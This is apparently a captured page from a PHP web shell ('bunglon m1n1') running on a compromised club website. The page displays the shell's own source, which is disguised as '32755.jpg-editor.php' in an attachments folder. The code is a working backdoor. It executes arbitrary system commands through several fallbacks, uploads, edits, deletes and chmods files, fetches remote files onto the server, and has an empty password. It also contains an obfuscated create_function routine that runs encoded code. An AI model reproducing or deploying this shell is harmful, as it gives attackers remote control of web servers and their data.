:: bunglon m1n1 1.0 ::

Kernel : Linux webm039.cluster003.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Disable function : _dyuweyrj4,_dyuweyrj4r,dl
Safe mode : OFF
Host : www.mehariclubdefrance.com | Server ip : 10.3.20.37 | Your ip : 18.118.210.233 | Time @ Server : 06 May 2025 05:29:36
MySQL : ON | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON
/home/meharicl/www/fait3-3/old_attachement/
HOME about upload exec mass file domain root vuln newfile newfolder kill me
File Path : /home/meharicl/www/fait3-3/old_attachement/32755.jpg-editor.php
<?php
@error_reporting(E_ERROR);
@ini_set('display_errors', 'Off');
@ini_set('max_execution_time', 10000);
header("content-Type: text/html; charset=utf8");


$password = ""; 

function strdir($str) {
    return str_replace(array(
        '\\',
        '//',
        '%27',
        '%22'
    ) , array(
        '/',
        '/',
        '\'',
        '"'
    ) , chop($str));
}
function chkgpc($array) {
    foreach ($array as $key => $var) {
        $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);
    }
    return $array;
}
$myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
$myfile = strpos($myfile, 'eval()') ? array_shift(explode('(', $myfile)) : $myfile;
define('THISDIR', strdir(dirname($myfile) . '/'));
define('ROOTDIR', strdir(strtr($myfile, array(
    strdir($_SERVER['PHP_SELF']) => ''
)) . '/'));
define('EXISTS_PHPINFO', getinfo() ? true : false);
if (get_magic_quotes_gpc()) {
    $_POST = chkgpc($_POST);
}
if (function_exists('mysql_close')) {
    $issql = 'MySql';
}
if (function_exists('mssql_close')) $issql.= ' - MsSql';
if (function_exists('oci_close')) $issql.= ' - Oracle';
if (function_exists('sybase_close')) $issql.= ' - SyBase';
if (function_exists('pg_close')) $issql.= ' - PostgreSql';
$win = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;
#$msg = VERSION;
function filew($filename, $filedata, $filemode) {
    if ((!is_writable($filename)) && file_exists($filename)) {
        chmod($filename, 0666);
    }
    $handle = fopen($filename, $filemode);
    $key = fputs($handle, $filedata);
    fclose($handle);
    return $key;
}
function filer($filename) {
    $handle = fopen($filename, 'r');
    $filedata = fread($handle, filesize($filename));
    fclose($handle);
    return $filedata;
}
function fileu($filenamea, $filenameb) {
    $key = move_uploaded_file($filenamea, $filenameb) ? true : false;
    if (!$key) {
        $key = copy($filenamea, $filenameb) ? true : false;
    }
    return $key;
}
function filed($filename) {
    if (!file_exists($filename)) return false;
    $name = basename($filename);
    $array = explode('.', $name);
    header('Content-type: application/x-' . array_pop($array));
    header('Content-Disposition: attachment; filename=' . $name);
    header('Content-Length: ' . filesize($filename));
    @readfile($filename);
    exit;
}
function showdir($dir) {
    $dir = strdir($dir . '/');
    $handle = opendir($dir);
    if (!$handle) return false;
    $array = array();
    while ($name = readdir($handle)) {
        if ($name == '.' || $name == '..') continue;
        $path = $dir . $name;
        $name = strtr($name, array(
            '\'' => '%27',
            '"' => '%22'
        ));
        if (is_dir($path)) {
            $array['dir'][$path] = $name;
        } else {
            $array['file'][$path] = $name;
        }
    }
    closedir($handle);
    return $array;
}
function deltree($dir) {
    $handle = @opendir($dir);
    while ($name = @readdir($handle)) {
        if ($name == '.' || $name == '..') continue;
        $path = $dir . $name;
        @chmod($path, 0777);
        if (is_dir($path)) {
            deltree($path . '/');
        } else {
            @unlink($path);
        }
    }
    @closedir($handle);
    return @rmdir($dir);
}
function postinfo($array, $string) {
    $infos = array(
        function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e") ,
        function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")
    );
    if ($infos[0] && $infos[1]) {
        $info = base64_decode($string);
        $walks = array(
            0 => bin2hex($array)
        );
        @array_walk($walks, @create_function("\x24\x61\x72\x72\x61\x79\x2c\x24\x6b\x65\x79", str_rot13($info)));
    }
    return ob_end_clean();
}
function size($bytes) {
    if ($bytes < 1024) return $bytes . ' B';
    $array = array(
        'B',
        'K',
        'M',
        'G',
        'T'
    );
    $floor = floor(log($bytes) / log(1024));
    return sprintf('%.2f ' . $array[$floor], ($bytes / pow(1024, floor($floor))));
}
function find($array, $string) {
    foreach ($array as $key) {
        if (stristr($string, $key)) return true;
    }
    return false;
}
function scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now) {
    $handle = opendir($dir);
    if (!$handle) return false;
    while ($name = readdir($handle)) {
        if ($name == '.' || $name == '..') continue;
        $path = $dir . $name;
        if (is_dir($path)) {
            if ($fit && in_array($name, $fit)) continue;
            if ($ran == 0 && is_readable($path)) scanfile($path . '/', $key, $inc, $fit, $tye, $chr, $ran, $now);
        } else {
            if ($inc && (!find($inc, $name))) continue;
            $code = $tye ? filer($path) : $name;
            $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)) , 'M') ? false : (strpos($code, $key) > - 1));
            if ($find) {
                $file = strtr($path, array(
                    $now => '',
                    '\'' => '%27',
                    '"' => '%22'
                ));
                echo '<a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>';
                flush();
                ob_flush();
            }
            unset($code);
        }
    }
    closedir($handle);
    return true;
}
function antivirus($dir, $exs, $matches, $now) {
    $handle = opendir($dir);
    if (!$handle) return false;
    while ($name = readdir($handle)) {
        if ($name == '.' || $name == '..') continue;
        $path = $dir . $name;
        if (is_dir($path)) {
            if (is_readable($path)) antivirus($path . '/', $exs, $matches, $now);
        } else {
            $iskill = NULL;
            foreach ($exs as $key => $ex) {
                if (find(explode('|', $ex) , $name)) {
                    $iskill = $key;
                    break;
                }
            }
            if (strpos(size(filesize($path)) , 'M')) continue;
            if ($iskill) {
                $code = filer($path);
                foreach ($matches[$iskill] as $matche) {
                    $array = array();
                    preg_match($matche, $code, $array);
                    if (strpos($array[0], '$this->') || strpos($array[0], '[$vars[')) continue;
                    $len = strlen($array[0]);
                    if ($len > 10 && $len < 150) {
                        $file = strtr($path, array(
                            $now => '',
                            '\'' => '%27',
                            '"' => '%22'
                        ));
                        echo '特征 <input type="text" value="' . htmlspecialchars($array[0]) . '"> <a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>';
                        flush();
                        ob_flush();
                        break;
                    }
                }
                unset($code, $array);
            }
        }
    }
    closedir($handle);
    return true;
}
function command($cmd, $cwd, $com = false) {
    $iswin = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;
    $res = $msg = '';
    if ($cwd == 'com' || $com) {
        if ($iswin && class_exists('COM')) {
            $wscript = new COM('Wscript.Shell');
            $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c ' . $cmd);
            $stdout = $exec->StdOut();
            $res = $stdout->ReadAll();
            $msg = 'Wscript.Shell';
        }
    } else {
        chdir($cwd);
        $cwd = getcwd();
        if (function_exists('exec')) {
            @exec($cmd, $res);
            $res = join("\n", $res);
            $msg = 'exec';
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cmd);
            $msg = 'shell_exec';
        } elseif (function_exists('system')) {
            ob_start();
            @system($cmd);
            $res = ob_get_contents();
            ob_end_clean();
            $msg = 'system';
        } elseif (function_exists('passthru')) {
            ob_start();
            @passthru($cmd);
            $res = ob_get_contents();
            ob_end_clean();
            $msg = 'passthru';
        } elseif (function_exists('popen')) {
            $fp = @popen($cmd, 'r');
            if ($fp) {
                while (!feof($fp)) {
                    $res.= fread($fp, 1024);
                }
            }
            @pclose($fp);
            $msg = 'popen';
        } elseif (function_exists('proc_open')) {
            $env = $iswin ? array(
                'path' => 'c:\\windows\\system32'
            ) : array(
                'path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'
            );
            $des = array(
                0 => array(
                    "pipe",
                    "r"
                ) ,
                1 => array(
                    "pipe",
                    "w"
                ) ,
                2 => array(
                    "pipe",
                    "w"
                )
            );
            $process = @proc_open($cmd, $des, $pipes, $cwd, $env);
            if (is_resource($process)) {
                fwrite($pipes[0], $cmd);
                fclose($pipes[0]);
                $res.= stream_get_contents($pipes[1]);
                fclose($pipes[1]);
                $res.= stream_get_contents($pipes[2]);
                fclose($pipes[2]);
            }
            @proc_close($process);
            $msg = 'proc_open';
        }
    }
    #$msg = $res == '' ? '<h1>Comand Not Found</h1>';
    return array(
        'res' => $res,
        'msg' => $msg
    );
}

function getinfo() {
    global $password;
    $infos = array(
        $_POST['getpwd'],
        $password,
        function_exists('phpinfo') ,
        "\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"
    );
    if ($password != '' && md5($infos[0]) != $infos[1]) {
        echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';
        if (isset($_POST['pass'])) {
            echo '<input type="hidden" name="pass" value="' . $_POST['pass'] . '">';
        }
        if (isset($_POST['check'])) {
            echo '<input type="hidden" name="check" value="' . $_POST['check'] . '">';
        }
        echo '<input type="submit" value=" O K "></form></center></body></html>';
        exit;
    }
    
    return $infos[2];
}
function subeval() {
    if (isset($_POST['getpwd'])) {
        echo '<input type="hidden" name="getpwd" value="' . $_POST['getpwd'] . '">';
    }
    if (isset($_POST['pass'])) {
        echo '<input type="hidden" name="pass" value="' . $_POST['pass'] . '">';
    }
    if (isset($_POST['check'])) {
        echo '<input type="hidden" name="check" value="' . $_POST['check'] . '">';
    }
    return true;
}
if (isset($_POST['go'])) {
    if ($_POST['go'] == 'down') {
        $downfile = $fileb = strdir($_POST['godir'] . '/' . $_POST['govar']);
        if (!filed($downfile)) {
            $msg = '<h1>下载文件不存在</h1>';
        }
    }
} ?>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">* {margin:0px;padding:0px;}
body{background:#000000;;color:#ffff;font-size:13px;font-family: monospace, monospace;;text-align:left;word-wrap:break-word; word-break:break-all;}
a{color:#fff;text-decoration:none;vertical-align:middle;}
a:hover{color:#fff;text-decoration:underline;}
p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}
input,select { vertical-align:middle; }input[type=text],
textarea {padding:1px;}input[type=submit], input[type=button] 
{height:21px;}.tag {margin-left:1px;height:25px;padding-top:5px;}
.tag a {background:#fff;text-align:center;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
.tag a:hover, .tag a.current {background:#FF5151;color:#000000;text-decoration:none;}
.main {width:963px;margin:0 auto;padding:10px;}
.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
.toptag {padding:20px;text-align:left;font-weight:bold;color:#fff;background:#000;}

.actall {background:#fff;text-align:left;font-size:15px;padding:3px;vertical-align:middle;}
.tables {width:100%;}
.tables th {text-align:left;border-color:#6E7D37 #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
.tables td {background:#242424;height:19px;padding-left:2px;}

</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); } function nf(a,b) { re = prompt("新建名",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = "所选文件"; $('act').value = a; } else { var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("确定要删除"+msg+"吗")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php
echo VERSION . ' - 【' . date('Y-m-d H:i:s 星期N', time()) . '】'; ?></title></head><body><div class="main"><div class="outl"><div class="toptag"><?php
echo php_uname() . '<br>'  .$_SERVER['SERVER_ADDR'] .  '(' . get_current_user() . ')';
 ?></div><?php
$menu = array(
    'file' => ' FileMan',
  #  'scan' => 'SCAN',
   # 'antivirus' => 'ANTIVIRUS',
    #'backshell' => 'CONNECT',
    'exec' => ' CMD',
    #'phpeval' => 'PHP',
    #'sql' => ' MySQL',
    #'info' => 'INFO'
);
$go = array_key_exists($_POST['go'], $menu) ? $_POST['go'] : 'file';
$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']) . '/') : THISDIR;
echo '<div class="tag">';
foreach ($menu as $key => $name) {
    echo '<a' . ($go == $key ? ' class="current"' : '') . ' href="javascript:void(0);" onclick="go(\'' . $key . '\',\'' . base64_encode($nowdir) . '\');">' . $name . '</a> ';
}
echo '</div>';
echo '<form name="gofrm" id="gofrm" method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="">';
echo '<input type="hidden" name="godir" id="godir" value="' . $nowdir . '">';
echo '<input type="hidden" name="govar" id="govar" value="">';
echo '</form>';
switch ($_POST['go']) {
   

    case "exec":
        $cmd = $win ? 'dir' : 'ls -al';
        $res = array(
            'res' => '',
            'msg' => $msg
        );
        $str = isset($_POST['str']) ? $_POST['str'] : 'fun';
        if (isset($_POST['cmd'])) {
            $cmd = $_POST['cmd'];
            $cwd = $str == 'fun' ? THISDIR : 'com';
            $res = command($cmd, $cwd);
        }
        echo '<div class="msgbox">' . $res['msg'] . '</div>';
        echo '<form method="POST">';
        subeval();
        echo '<input type="hidden" name="go" id="go" value="exec">';
        echo '<div class="actall">Comand <input type="text" name="cmd" id="cmd" value="' . htmlspecialchars($cmd) . '" style="width:398px;"> ';
   
        
       
        echo '<input type="submit" style="width:50px;" value="Go">';
        echo '</div><div class="actall"><textarea style="width:698px;height:368px;">' . htmlspecialchars($res['res']) . '</textarea></div></form>';
        break;

   

    case "edit":
    case "editor":
        $file = strdir($_POST['godir'] . '/' . $_POST['govar']);
        $iconv = function_exists('iconv');
        if (!file_exists($file)) {
            $msg = '【新建文件】';
        } else {
            $code = filer($file);
            $chst = '默认';
            if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $code) && $iconv) {
                $chst = 'utf-8';
                $code = @iconv('UTF-8', 'GB2312//IGNORE', $code);
            }
            $size = size(filesize($file));
            $msg = '【文件属性 ' . substr(decoct(fileperms($file)) , -4) . '】 【文件大小 ' . $size . '】 【文件编码 ' . $chst . '】';
        }
        echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');
        echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE查找内容" onclick="search($(\'keyword\').value);"> - ' . $msg . '</div>';
        echo '<form name="editfrm" id="editfrm" method="POST">';
        subeval();
        echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';
        echo '<input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';
        echo '<div class="actall">文件 <input type="text" name="filename" value="' . $file . '" style="width:528px;"> ';
        if ($iconv) {
            echo '编码 <select name="tostr">';
            $selects = array(
                'normal' => '默认',
                'utf' => 'utf-8'
            );
            foreach ($selects as $var => $name) {
                echo '<option value="' . $var . '"' . ($name == $chst ? ' selected' : '') . '>' . $name . '</option>';
            }
            echo '</select>';
        }
        echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">' . htmlspecialchars($code) . '</textarea></div></form>';
        echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';
        echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';
        subeval();
        echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
        break;

    case "upfiles":
        $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];
        $msg = '【最大上传文件 ' . get_cfg_var("upload_max_filesize") . '】 【POST最大提交数据 ' . get_cfg_var("post_max_size") . '】';
        $max = 10;
        if (isset($_FILES['uploads']) && isset($_POST['renames'])) {
            $uploads = $_FILES['uploads'];
            $msgs = array();
            for ($i = 1; $i < $max; $i++) {
                if ($uploads['error'][$i] == UPLOAD_ERR_OK) {
                    $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
                    $filea = $uploads['tmp_name'][$i];
                    $fileb = strdir($updir . '/' . $rename);
                    $msgs[$i] = fileu($filea, $fileb) ? '<br><h2>上传成功 ' . $rename . '</h2>' : '<br><h1>上传失败 ' . $rename . '</h1>';
                }
            }
        }
        echo '<div class="msgbox">' . $msg . '</div>';
        echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';
        subeval();
        echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';
        echo '<div class="actall"><p>上传到目录 <input type="text" name="updir" style="width:398px;" value="' . $updir . '"></p>';
        for ($i = 1; $i < $max; $i++) {
            echo '<p>附件' . $i . ' <input type="file" name="uploads[' . $i . ']" style="width:300px;"> 重命名 <input type="text" name="renames[' . $i . ']" style="width:128px;"> ' . $msgs[$i] . '</p>';
        }
        echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上传" style="width:80px;"> ';
        echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . $updir . '">';
        subeval();
        echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
        break;

    default:
        if (isset($_FILES['upfile'])) {
            if ($_FILES['upfile']['name'] == '') {
                $msg = '<h1>Upload Error!</h1>';
            } else {
                $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename'];
                $filea = $_FILES['upfile']['tmp_name'];
                $fileb = strdir($nowdir . $rename);
                $msg = fileu($filea, $fileb) ? '<h2>上传文件' . $rename . '成功</h2>' : '<h1>上传文件' . $rename . '失败</h1>';
            }
        }
        if (isset($_POST['act'])) {
            switch ($_POST['act']) {
                case "a":
                    if (!$_POST['files']) {
                        $msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';
                    } else {
                        $i = 0;
                        foreach ($_POST['files'] as $filename) {
                            $i+= @copy(strdir($nowdir . $filename) , strdir($_POST['var'] . '/' . $filename)) ? 1 : 0;
                        }
                        $msg = $msg = $i ? '<h2>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '成功</h2>' : '<h1>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '失败</h1>';
                    }
                    break;

                case "b":
                    if (!$_POST['files']) {
                        $msg = '<h1>请选择文件</h1>';
                    } else {
                        $i = 0;
                        foreach ($_POST['files'] as $filename) {
                            $i+= @unlink(strdir($nowdir . $filename)) ? 1 : 0;
                        }
                        $msg = $i ? '<h2>共删除 ' . $i . ' 个文件成功</h2>' : '<h1>共删除 ' . $i . ' 个文件失败</h1>';
                    }
                    break;

                case "c":
                    if (!$_POST['files']) {
                        $msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';
                    } elseif (!ereg("^[0-7]{4}$", $_POST['var'])) {
                        $msg = '<h1>属性值错误</h1>';
                    } else {
                        $i = 0;
                        foreach ($_POST['files'] as $filename) {
                            $i+= @chmod(strdir($nowdir . $filename) , base_convert($_POST['var'], 8, 10)) ? 1 : 0;
                        }
                        $msg = $i ? '<h2>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '失败</h1>';
                    }
                    break;

                case "d":
                    if (!$_POST['files']) {
                        $msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';
                    } elseif (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['var'])) {
                        $msg = '<h1>时间格式错误 ' . $_POST['var'] . '</h1>';
                    } else {
                        $i = 0;
                        foreach ($_POST['files'] as $filename) {
                            $i+= @touch(strdir($nowdir . $filename) , strtotime($_POST['var'])) ? 1 : 0;
                        }
                        $msg = $i ? '<h2>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '失败</h1>';
                    }
                    break;

                case "e":
                    $path = strdir($nowdir . $_POST['var'] . '/');
                    if (file_exists($path)) {
                        $msg = '<h1>目录已存在 ' . $_POST['var'] . '</h1>';
                    } else {
                        $msg = @mkdir($path, 0777) ? '<h2>创建目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>创建目录 ' . $_POST['var'] . ' 失败</h1>';
                    }
                    break;

                case "f":
                    $context = array(
                        'http' => array(
                            'timeout' => 30
                        )
                    );
                    if (function_exists('stream_context_create')) {
                        $stream = stream_context_create($context);
                    }
                    $data = @file_get_contents($_POST['var'], false, $stream);
                    $filename = array_pop(explode('/', $_POST['var']));
                    if ($data) {
                        $msg = filew(strdir($nowdir . $filename) , $data, 'wb') ? '<h2>下载 ' . $filename . ' 成功</h2>' : '<h1>下载 ' . $filename . ' 失败</h1>';
                    } else {
                        $msg = '<h1>下载失败或不支持下载</h1>';
                    }
                    break;

                case "rf":
                    $files = explode('|x|', $_POST['var']);
                    if (count($files) != 2) {
                        $msg = '<h1>输入错误</h1>';
                    } else {
                        $msg = @rename(strdir($nowdir . $files[1]) , strdir($nowdir . $files[0])) ? '<h2>重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 成功</h2>' : '<h1>重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 失败</h1>';
                    }
                    break;

                case "pd":
                    $files = explode('|x|', $_POST['var']);
                    if (count($files) != 2) {
                        $msg = '<h1>输入错误</h1>';
                    } else {
                        $path = strdir($nowdir . $files[1]);
                        $msg = @chmod($path, base_convert($files[0], 8, 10)) ? '<h2>修改' . $files[1] . '属性为' . $files[0] . '成功</h2>' : '<h1>修改' . $files[1] . '属性为' . $files[0] . '失败</h1>';
                    }
                    break;

                case "edit":
                    if (isset($_POST['filename']) && isset($_POST['filecode'])) {
                        if ($_POST['tostr'] == 'utf') {
                            $_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']);
                        }
                        $msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '<h2>保存成功 ' . $_POST['filename'] . '</h2>' : '<h1>保存失败 ' . $_POST['filename'] . '</h1>';
                    }
                    break;

                case "deltree":
                    $deldir = strdir($nowdir . $_POST['var'] . '/');
                    if (!file_exists($deldir)) {
                        $msg = '<h1>目录 ' . $_POST['var'] . ' 不存在</h1>';
                    } else {
                        $msg = deltree($deldir) ? '<h2>删除目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>删除目录 ' . $_POST['var'] . ' 失败</h1>';
                    }
                    break;
            }
        }
        $chmod = substr(decoct(fileperms($nowdir)) , -4);
        if (!$chmod) {
            $msg.= ' - <h1>无法读取目录</h1>';
        }
        $array = showdir($nowdir);
        $thisurl = strdir('/' . strtr($nowdir, array(
            ROOTDIR => ''
        )) . '/');
        $nowdir = strtr($nowdir, array(
            '\'' => '%27',
            '"' => '%22'
        ));
        echo '<div class="msgbox">' . $msg . '</div>';
        echo '<div class="actall"><form name="frm" id="frm" method="POST">';
        subeval();
        echo (is_writable($nowdir) ? '<h2>DIR</h2>' : '<h1>DIR</h1>') . ' <input type="text" name="dir" id="dir" style="width:508px;" value="' . strdir($nowdir . '/') . '"> ';
        echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="Go"> ';
        echo '<input type="button" onclick="cd(\'' . ROOTDIR . '\');" style="width:68px;" value="Root Dir"> ';
        echo '<input type="button" onclick="cd(\'' . THISDIR . '\');" style="width:68px;" value="Shell Dir"> ';
        
        echo '</select></form></div><div class="actall">';
        echo '<input type="button" value="New File" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';
        echo '<input type="button" value="New Dir" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:68px;"> ';
        #echo '<input type="button" value="Upload" onclick="go(\'upfiles\',\'' . $nowdir . '\');" style="width:68px;"> ';
        echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
        subeval();
        echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';
        echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';
        echo '<input type="button" onclick="$(\'upfrm\').submit();" value="Upload" style="width:50px;"> ';
       # echo 'Rename to <input type="text" name="rename" style="width:128px;">';
        echo '</form></div>';
        echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
        subeval();
        echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';
        echo '<input type="hidden" name="act" id="act" value="">';
        echo '<input type="hidden" name="var" id="var" value="">';
        echo '<th><a href="javascript:void(0);" onclick="cd(\'' . dirname($nowdir) . '/\');">Back..</a></th><th style="width:8%">Action</th><th style="width:5%">Perm</th><th style="width:17%">Upload Time</th><th style="width:17%">Last Modify</th><th style="width:8%">Download</th>';
        if ($array) {
            asort($array['dir']);
            asort($array['file']);
            $dnum = $fnum = 0;
            foreach ($array['dir'] as $path => $name) {
                $prem = substr(decoct(fileperms($path)) , -4);
                $ctime = date('Y-m-d H:i:s', filectime($path));
                $mtime = date('Y-m-d H:i:s', filemtime($path));
                echo '<tr>';
                echo '<td><a href="javascript:void(0);" onclick="cd(\'' . $nowdir . $name . '\');"><b>' . strtr($name, array(
                    '%27' => '\'',
                    '%22' => '"'
                )) . '</b></a></td>';
                echo '<td><a href="javascript:void(0);" onclick="dels(\'' . $name . '\');">删除</a> ';
                echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>';
                echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';
                echo '<td>' . $ctime . '</td>';
                echo '<td>' . $mtime . '</td>';
                echo '<td>-</td>';
                echo '</tr>';
                $dnum++;
            }
            foreach ($array['file'] as $path => $name) {
                $prem = substr(decoct(fileperms($path)) , -4);
                $ctime = date('Y-m-d H:i:s', filectime($path));
                $mtime = date('Y-m-d H:i:s', filemtime($path));
                $size = size(filesize($path));
                echo '<tr>';
                echo '<td><input type="checkbox" name="files[]" value="' . $name . '"><a target="_blank" href="' . $thisurl . $name . '">' . strtr($name, array(
                    '%27' => '\'',
                    '%22' => '"'
                )) . '</a></td>';
                echo '<td><a href="javascript:void(0);" onclick="go(\'edit\',\'' . $name . '\');">Edit</a> ';
                echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">Mv</a></td>';
                echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';
                echo '<td>' . $ctime . '</td>';
                echo '<td>' . $mtime . '</td>';
                echo '<td align="right"><a href="javascript:void(0);" onclick="go(\'down\',\'' . $name . '\');">' . $size . '</a></td>';
                echo '</tr>';
                $fnum++;
            }
        }
        unset($array);
        echo '</table>';
        echo '<div class="actall" style="text-align:left;">';
        echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
        echo '<input type="button" value="Copy" style="width:50px;" onclick=\'txts("Copy","' . $nowdir . '","a");\'> ';
        echo '<input type="button" value="Delete" style="width:50px;" onclick=\'dels("b");\'> ';
        echo '<input type="button" value="Chmod" style="width:50px;" onclick=\'txts("Chmod","0666","c");\'> ';
        #echo '<input type="button" value="Time" style="width:50px;" onclick=\'txts("Time","' . $mtime . '","d");\'> ';
        #echo 'Total Dir[' . $dnum . '] - Total Files[' . $fnum . '] - Permission[' . $chmod . ']</div></form>';
        break;
    } ?>